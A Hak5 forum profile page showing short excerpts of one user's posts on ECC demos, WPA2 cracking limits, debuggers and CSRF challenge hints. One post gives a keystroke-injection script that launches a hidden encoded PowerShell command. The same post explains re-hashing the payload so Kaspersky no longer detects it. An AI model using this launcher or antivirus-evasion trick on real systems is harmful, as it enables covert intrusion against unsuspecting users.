About fugu

  • Rank
    Hak5 Zombie

  1. This is untested, but I rewrote the hashing that your exploit is using. Instead of the ror13 hash that was being used, I changed it to ror12. On VirusTotal now, Kaspersky is unable to detect it, but it could be because I created a bug that I don't know about in the process; like I said, I haven't tested it.

         DELAY 5000
         GUI r
         DELAY 1000
         STRING cmd
         ENTER
         DELAY 1000
         STRING powershell -nop -win hidden -noni -enc ...
  2. I know a really ugly way to do this; it kinda works but is going to throw some errors in the process. You create a .bat file like auto.bat:

         #/bin/sh
         goto label0
         ./MacOSX_program
         exit 0
         :label0
         .\Windows_program.exe

     The Windows OS will see that the filename has a .bat extension. It doesn't know what #/bin/sh means so it throws an error, but continues on. It follows the goto to the label0 and then runs the Windows_program.exe. The Mac OS will ignore the .bat extension, but read #/bin/sh as a shell script. It will error on the goto, but continue on to run the MacOSX_program
  3. A while back I was looking into creating a program that would create a rainbowtables-like set of tables that would handle WPA2/HMAC/SHA1, and I probably could have started making one, but the major problem with it is that the keyspace size is way too large. This is referred to as Time Memory Trade Off, so the less time you want it to take, the more memory your tables are going to take up on the hard drive. For WPA2 the keyspace is going to be based on the PASSPHRASE that was used, plus SSID, plus a random number called the ANONCE, plus a random number called the SNONCE. Even if you knew what the p
  4. In many of the documents that I've been looking over, they talk about many of these things in terms of the mathematics, and I tend to see the same single-letter variables being used over and over again. Some references will use different letters so it's not always constant, but I was primarily going off of the site http://www.johannes-bauer.com/compsci/ecc/ for a majority of the concepts. The functions for point addition, point doubling, and scalar multiplication were pulled directly from "Implementation of Elliptic Curve Cryptography in C" by Kuldeep Bhardwaj and Sanjay Chaudhary, appendix A.
  5. So this is a little demo I've been working on that plays around with ECC Point Mathematics & encryption. Many of the demos I've found have not been functional from beginning to end, and although this is not going to be a secure version of ECC, it does demo some of the basic properties of it. I'm using pieces of existing code, along with my own, to get it working. Individual ECC curve properties as well as the public key/private key pair can be created with openssl: CRYPTNAME=secp192k1 && openssl ecparam -name $CRYPTNAME -out $CRYPTNAME.pem && openssl ecparam -in $CR
  6. You can also try powershell.exe -command "Write-Host (New-Object System.Net.WebClient).DownloadString(\"http://diagnostic.opendns.com/myip\")"
  7. fugu

    anti-CSRF measure

    https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet I think this is the solution to that challenge, if I'm not mistaken.
  8. fugu

    anti-CSRF measure

    Don't ereg and eregi use regular expressions? If you have control of what will end up in the referrer field, couldn't you try and make the referrer a very widely encompassing regex like .* or something? I'm not sure the * is valid in the hostname location but maybe you can figure something out.
  9. The only way to know for sure what your external IP is (for the network you're connected up to) is to send out a request and have the destination server tell you what your IP is. This has a lot of legitimate uses; NoScript's ABE uses this to help protect your browser. You might consider looking at dynamic DNS as a solution to what you're trying to do. There is software that is used on desktop machines to keep the external IP address of your home network associated with a DNS entry, so that if you ever want to log into your home network when you're away, you can just use your own DNS to do so.
  10. fugu

    anti-CSRF measure

    I don't know if you have the ability to modify the code, but if you can, adding echo "<pre><code>"; var_dump($_SERVER); echo "</code></pre>"; will let you examine all the various header entries that are stored in the $_SERVER variable during your request.
  11. Implementation of Elliptic Curve Cryptography in 'C'
      http://www.researchtrend.net/ijet32/6%20KULDEEP%20BHARDWAJ.pdf
      Elliptic Curve Cryptography: Algorithms and Implementation Analysis over Coordinate Systems
      http://www.researchgate.net/profile/Iskandar_Setiadi/publication/268688957_Elliptic_Curve_Cryptography_Algorithms_and_Implementation_Analysis_over_Coordinate_Systems/links/5474337a0cf29afed60f6340.pdf
  12. fugu


    I've heard the Samsung S7 works even while pouring champagne on it.
  13. No problem:) There is a slightly better version of this at the Exploit DB www.exploit-db.com under shellcodes, which doesn't spam the log file or bog down the CPU.
  14. I've been looking for a new debugger for a while now. My previous debugger of choice for Windows was OllyDbg, which is the very first debugger I started with, but it's so outdated, and when I hop OSes (non-Windows) it is not compatible. In Linux I tend to just use gdb, but it's more designed for the command line, and it's nice to be able to look at the disassembled code, registers and stack all at the same time; imo it makes it easier to see what's going on. The debugger that looks most promising (to me) is IDA Pro; it's available in multiple architectures, and I think it can even debug remotely
  15. Is it possible that someone nearby is using airbase-ng to create fake APs?